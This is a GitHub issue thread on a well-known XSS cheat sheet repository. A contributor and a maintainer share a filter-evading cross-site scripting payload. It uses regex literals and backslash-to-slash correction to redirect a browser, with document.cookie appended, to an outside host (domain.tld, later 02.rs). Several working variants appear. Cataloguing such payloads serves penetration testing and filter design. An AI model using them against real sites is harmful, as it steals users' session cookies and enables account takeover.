### ISSUE TITLE
XSS cookie exfiltration without parentheses, backticks or quotes

### ISSUE THREAD

**Issue by the-xentropy** [PortSwigger/xss-cheatsheet-data#23]
Was playing around creating XSS payloads recently and found a way to exfiltrate cookies without parentheses, backticks or quotes. It redirects an user with the cookies as part of the URL and abuses the regex literal and the fact that browsers autocorrect \ to / in order to avoid using any quotes.

`<video><source onerror=location=/https:\\domain.tld\page/.source+document.cookie >`
This redirects an user to e.g. 
`https://domain.tld/pagesecret=secret`

It's somewhat unfortunate that you need some kind of string after the last back-slash and that you need the last back-slash, otherwise it thinks the cookie string is part of the tld, but it wouldn't make much of a difference to an attacker since they could trivially extract the secret from their server logs regardless.

I frequently have to battle different encodings and filters while finding XSS, so figured it may come in useful for someone else too.

Please keep up the great work on this amazing cheat sheet. <3

**Comment by the-xentropy** [comment]
Just realized you can just use a double-backslash instead of e.g. \page, like so:
`<video><source onerror=location=/https:\\domain.tld\\/.source+document.cookie >`

Url ends up being e.g.  `https://example.com//abc=123`, so pick your poison, but figured I'd mention it. :)

**Comment by hackvertor** [comment]
Hiya glad you brought this up, I think it's well known you can use regexes this way but it should definitely be on the cheat sheet so thanks for submission. It probably belongs in the restricted characters section so I'll add it. Thanks for the quality submission!

**Comment by the-xentropy** [comment]
No problem! I agree on the regex literals bit, but the ability to combine
it with backslashes to provide absolute URLs using it surprised me. Anyway,
happy to contribute! :)

**Comment by hackvertor** [comment]
This is going to be in the next release. It could be shortened to:
<video><source onerror=location=/\\02.rs/+document.cookie>
